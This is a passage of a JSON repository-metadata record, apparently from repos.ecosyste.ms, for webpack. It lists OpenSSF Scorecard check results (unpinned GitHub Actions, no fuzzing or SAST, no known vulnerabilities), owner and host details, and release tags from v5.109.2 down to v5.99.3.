.github/workflows/test.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:39: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:53: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:72: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:77: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:85: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:96: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:98: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:109: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:111: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:118: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:124: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:162: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:163: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:174: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:200: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:207: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Info:   0 out of  22 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   4 third-party GitHubAction dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 28 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-20T09:35:41.151Z","repository_id":2686067,"created_at":"2025-08-20T09:35:41.151Z","updated_at":"2025-08-20T09:35:41.151Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36825724,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-22T02:00:06.114Z","response_time":51,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"webpack","name":"webpack","uuid":"2105791","kind":"organization","description":"","email":null,"website":"https://webpack.js.org","location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/2105791?v=4","repositories_count":50,"last_synced_at":"2024-10-29T23:38:53.364Z","metadata":{"has_sponsors_listing":false,"funding":{"open_collective":"webpack"}},"html_url":"https://github.com/webpack","funding_links":["https://opencollective.com/webpack"],"total_stars":95072,"followers":924,"following":0,"created_at":"2022-11-02T16:19:08.894Z","updated_at":"2024-10-29T23:38:53.365Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack/repositories"},"tags":[{"name":"v5.109.2","sha":"6a24bd65b72c43207c36ce61b54e1f5833486906","kind":"tag","published_at":"2026-07-28T18:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2/manifests"},{"name":"v5.109.1","sha":"ec3908838175b79c004f61f9bf53d57a6d0e52f8","kind":"tag","published_at":"2026-07-27T21:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1/manifests"},{"name":"v5.109.0","sha":"21cd11a1f53567a42eee3a0be822b968a1ffcb12","kind":"tag","published_at":"2026-07-23T19:19:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0/manifests"},{"name":"v5.108.4","sha":"bb9ccfd32b8059819204a48bdb5436c9266dcdf0","kind":"tag","published_at":"2026-07-04T18:09:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4/manifests"},{"name":"v5.108.3","sha":"6844305fc2d9bceab547b6aae6fcd7ab12d598d8","kind":"tag","published_at":"2026-06-29T22:00:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3/manifests"},{"name":"v5.108.2","sha":"4dfe770e543f8e0c59184b9767e19b604d01af88","kind":"tag","published_at":"2026-06-29T12:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2/manifests"},{"name":"v5.108.1","sha":"da91761ed92c8e133ee321c7db4ad6c4698cae0a","kind":"tag","published_at":"2026-06-26T13:04:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1/manifests"},{"name":"v5.108.0","sha":"322b0603d6cae784063482cdc3cf8ca0b135a422","kind":"tag","published_at":"2026-06-25T09:40:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0/manifests"},{"name":"v5.107.2","sha":"cfb24a4af6ea68034b25f80e14f95aaeaad6d596","kind":"tag","published_at":"2026-05-25T15:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2/manifests"},{"name":"v5.107.1","sha":"a1ce7ebea4069d31ba27da07c07839d9dc1d69d6","kind":"tag","published_at":"2026-05-21T14:29:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1/manifests"},{"name":"v5.107.0","sha":"4657874201bb3a098445fca14e2f271c82a3f91c","kind":"tag","published_at":"2026-05-20T09:40:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0/manifests"},{"name":"v5.106.2","sha":"0d7e3e0153f0696311a590f90620506e8ab166ac","kind":"tag","published_at":"2026-04-15T11:44:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2/manifests"},{"name":"v5.106.1","sha":"a934b9bb0330aba61e759ef943b7303ba305959f","kind":"tag","published_at":"2026-04-10T10:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1/manifests"},{"name":"v5.106.0","sha":"8774a0110bea46f33fd2c504f59e698dbdcf136e","kind":"tag","published_at":"2026-04-08T15:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0/manifests"},{"name":"v5.105.4","sha":"27c13b44c861908793f160f9f7413b32543c0522","kind":"tag","published_at":"2026-03-03T16:29:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4/manifests"},{"name":"v5.105.3","sha":"714a0e3496f2189f76b5d2c98eacdeedae9e7c06","kind":"tag","published_at":"2026-02-26T10:27:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3/manifests"},{"name":"v5.105.2","sha":"0756c7eb697a7759afe081a1fcf8f5481ea06bc3","kind":"tag","published_at":"2026-02-12T15:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2/manifests"},{"name":"v5.105.1","sha":"8e50ef2035b9cb727aeaa97d7561545d1c102b91","kind":"tag","published_at":"2026-02-10T15:01:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1/manifests"},{"name":"v5.105.0","sha":"1486f9aacca11d79dbb7ddbceed29b7e6df7a7ab","kind":"tag","published_at":"2026-02-03T15:30:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0/manifests"},{"name":"v5.104.1","sha":"24e3c2d2c9f8c6d60810302b2ea70ed86e2863dc","kind":"commit","published_at":"2025-12-18T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1/manifests"},{"name":"v5.104.0","sha":"505a5e744fbcf4471ddb534bf1d4aebea9643c1b","kind":"commit","published_at":"2025-12-16T13:03:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0/manifests"},{"name":"v5.103.0","sha":"e0219482aafb9087a50ca0be45110727a33801fb","kind":"commit","published_at":"2025-11-18T11:07:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.103.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.103.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.103.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0/manifests"},{"name":"v5.102.1","sha":"c7ebdbda637ea73a03a23446f5db0f600e304772","kind":"commit","published_at":"2025-10-07T16:26:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1/manifests"},{"name":"v5.102.0","sha":"14c813a0b3709e142b3ed03355c6c15fc11b91a1","kind":"commit","published_at":"2025-09-29T18:24:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0/manifests"},{"name":"v5.101.3","sha":"07b1ac0213bcf9591a8dd5633535a43ecd248192","kind":"commit","published_at":"2025-08-18T12:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3/manifests"},{"name":"v5.101.2","sha":"1d9cc240a29d17f3986d9e9f96f2589d823e832c","kind":"commit","published_at":"2025-08-14T15:56:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2/manifests"},{"name":"v5.101.1","sha":"4a0aa5d204dd0cfbaecd99f87be97deac5a883ff","kind":"commit","published_at":"2025-08-12T11:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1/manifests"},{"name":"v5.101.0","sha":"5b87bedaf418b3cfa713d520bb70191098943917","kind":"commit","published_at":"2025-07-28T13:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0/manifests"},{"name":"v5.100.2","sha":"21fcdbb8f2bb3820d3309df8e399c6deced12b42","kind":"commit","published_at":"2025-07-15T13:35:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2/manifests"},{"name":"v5.100.1","sha":"ad1e3b46f46b9acd5bb9c377afcdc101338d5c96","kind":"commit","published_at":"2025-07-11T11:16:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1/manifests"},{"name":"v5.100.0","sha":"83c534ca3a6385ee7037220c7ba510ba5a8d944c","kind":"commit","published_at":"2025-07-09T11:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0/manifests"},{"name":"v5.99.9","sha":"6c9f912af2dfbb3e0e1a2a3ecdc3881c96363432","kind":"commit","published_at":"2025-05-20T11:50:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9/manifests"},{"name":"v5.99.8","sha":"a9cbd85abf476fe8aba0cb1037f7e630f5f8649f","kind":"commit","published_at":"2025-05-06T13:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8/manifests"},{"name":"v5.99.7","sha":"ad77deb6ed0b9540f9d2cf1a1c08f9d058a95da6","kind":"commit","published_at":"2025-04-25T10:47:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7/manifests"},{"name":"v5.99.6","sha":"f8eee102c20a3d79eddfed0194113c4d5759d9e4","kind":"commit","published_at":"2025-04-18T12:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6/manifests"},{"name":"v5.99.5","sha":"70e3d9d5dbd3548431b8878dead4647beff5c14f","kind":"commit","published_at":"2025-04-08T22:43:57.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5/manifests"},{"name":"v5.99.4","sha":"04e00736b03eee0fabfd32eee5323ddc3701083f","kind":"commit","published_at":"2025-04-08T20:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4/manifests"},{"name":"v5.99.3","sha":"2470d8e74c8b647203063826cae1ea5e691726a9","kind":"commit","published_at":"2025-04-08T14:49:22.000Z","download_url":"https://codeload.git